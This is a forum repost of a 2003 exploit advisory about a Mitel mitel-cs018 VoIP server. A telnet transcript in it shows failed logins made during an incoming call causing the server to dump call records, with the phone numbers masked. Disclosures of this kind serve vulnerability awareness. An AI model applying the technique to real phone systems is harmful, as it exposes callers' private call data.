Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Mitel mitel-cs018 - Call Data Information Disclosure

 Share


Recommended Posts

# Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure
# Date: 2003-07-28
# Exploit Author: Andrea Intilangelo (acme olografix / paranoici)
# Vendor Homepage: www.mitel.com
# Version: mitel-cs018
# Tested on: Windows, Linux

There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:

Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'. 
Username: mitel-cs018
Password: 
ERROR: Invalid Username/Password pair 
Username:
Password: 
Username: ^X^W^E^Q^W
Password: 
ERROR: Invalid Username/Password pair 
Username: Password: 
ERROR: Invalid Username/Password pair 
# in this moment a foreign call arrive from outside
Username: 155 OGIN 149        11:11:55                        D 2
156 ICIN            11:12: 6                        D 4 0xxxXxxxxx
157 XFIC 156        11:12: 6 151            0: 9:47 D 3
158 ICIN            11:12: 6                        D 3 0xxxXxxxxx
159 ANSW 146        11:12:11                0: 0: 9 D 4
160 HDIN 146        11:12:21                        D 4
162 HREC 146        11:12:27                0: 0: 6 D 4
163 ABND ?          11:12:37                0: 0:37 D 3 0xxxXxxxxx
164 ICIN            11:12:43                        D 3 0xxxXxxxxx
165 EXIC 146        11:12:54                0: 0:47 D 4
166 ANSW 146        11:13: 0                0: 0:16 D 3
167 HDIN 146        11:13: 6                        D 3
169 EXIC 146        11:13:13        156     0: 0:12 D 3
171 EXOG 149        11:13:46                0: 1:59 D 2 0xxXxxxxx
172 XFIC 156        11:16:53 146            0: 3:40 D 3 
# where "0xxXxxxxx" are telephone numbers
A derives table results is:
SEQ CODE  EXT   ACC   TIME     RX     TX   DURATION LN    DIALLED DIGITS   COST
No.       No.   COD HH:MM:SS  FROM    TO   HH:MM:SS No.
___ _____ ____ ____ ________  ____   ____  ____________   ______________  _______
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...